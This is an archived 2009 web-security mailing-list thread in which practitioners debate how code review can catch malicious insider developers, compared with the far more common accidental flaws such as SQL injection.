[WEB SECURITY] code review techniques for when you don't trust your developers or testers

Hoffman, Billy billy.hoffman at hp.com
Fri Aug 14 02:03:37 EDT 2009


I think if you added up the money, the legions of developers who *still* don't understand even the simplest of input validation do *way* more damage than a extremely rare insider threat. Lets walk before we run here people. I don't want to have "the which is better? dynamic evil coder scanner, static analysis for evil coders, or that big guy with the thick neck named WAFF with the rubber hose by the door" argument in 5 years.

Billy Hoffman
--
Manager, Web Security Research Group
HP Software
Direct: 770-343-7069


-----Original Message-----
From: Jim Manico [mailto:jim at manico.net] 
Sent: Thursday, August 13, 2009 7:42 PM
To: Bill Pennington; Steven M. Christey
Cc: kuznetso at alum.mit.edu; Mat Caughron; websecurity at webappsec.org; Hoffman, Billy
Subject: Re: [WEB SECURITY] code review techniques for when you don't trust your developers or testers

> I would love to see data on the frequency of bad evil programs doing 
> stuff in code. I would be somewhat shocked if that was a bigger  problem 
> than coder introduces SQLi for the 900th time.

One of the greatest failings of modern risk analysis is to ignore incredibly 
low likelihood but high impact risks.

An insider senior coder who is evil can take you down, easily.

- Jim

----- Original Message ----- 
From: "Bill Pennington" <bill.pennington at whitehatsec.com>
To: "Steven M. Christey" <coley at linus.mitre.org>
Cc: "Jim Manico" <jim at manico.net>; <kuznetso at alum.mit.edu>; "Mat Caughron" 
<mat at phpconsulting.com>; <websecurity at webappsec.org>; "Hoffman, Billy" 
<billy.hoffman at hp.com>
Sent: Thursday, August 13, 2009 1:01 PM
Subject: Re: [WEB SECURITY] code review techniques for when you don't trust 
your developers or testers


> The only 2 insider evil coder forensics investigations I ever did  where 
> of the business logic type. Both where so subtle that you would  be highly 
> unlikely to detect them. The only reason they where detected  is the bad 
> guys had made verbal comments to others that lead them to  hand review 
> every check-in these people had done. Even then they did  not catch it 
> until 4 different developers had reviewed it. I have not  seen a case 
> where people are just randomly making network connections  but I will 
> readily admit my data set is small.
>
> I would love to see data on the frequency of bad evil programs doing 
> stuff in code. I would be somewhat shocked if that was a bigger  problem 
> than coder introduces SQLi for the 900th time.
>
>
> ---
> Bill Pennington
> SVP Services
> WhiteHat Security Inc.
> http://www.whitehatsec.com
>
> On Aug 13, 2009, at 3:14 PM, Steven M. Christey wrote:
>
>>
>> On Thu, 13 Aug 2009, Jim Manico wrote:
>>
>>> This is a pain to get right, even more of a pain to maintain -
>>> especially since the tools to manage Java policy are poor, at best.  But
>>> I think it's our best defense in protecting an enterprise against the
>>> insider evil coder.
>>
>> There may be techniques for finding the "insider evil coder" doing 
>> things
>> that don't make sense like executing an external program and sending
>> results across a hard-coded network connection - Veracode did a  paper on
>> back door detection about a year ago.  To get any depth at all,  though,
>> you'd need a well-developed model of what the application is  supposed to
>> do, especially with respect to its interfaces with the OS, downstream
>> components, etc.
>>
>> That still won't address intentionally-introduced "business logic" 
>> issues
>> (with a narrower use of the term than perhaps Jeremiah's), or the  use of
>> legitimate interfaces to create covert channels.  In these cases, it
>> requires full human understanding of what the code is supposed to be 
>> doing
>> with *simultaneous* expert understanding of the domain.  Consider an  odd
>> divide-by-zero error that can only occur in a certain time zone on  one 
>> day
>> of a 30-year cycle with several other factors at play.  If you could  do
>> that type of analysis, then you would also probably have the ability  to
>> detect and produce a bug-free system.  The theorists throw around the
>> "undecidable" term a lot when it comes to proving that code doesn't  have
>> any bugs, and the evil-developer problem may be an alternate  expression 
>> of
>> that.
>>
>> In other words, I think it's impossible to prove that modern web-based
>> applications are correct from a security perspective (even with  respect 
>> to
>> only one layer of source code and ignoring the environment), and  this is
>> even more impossible if you care about business-logic correctness on  top
>> of the injection side of the spectrum.
>>
>> - Steve
>>
>> ----------------------------------------------------------------------------
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS:
>> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>
> 


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list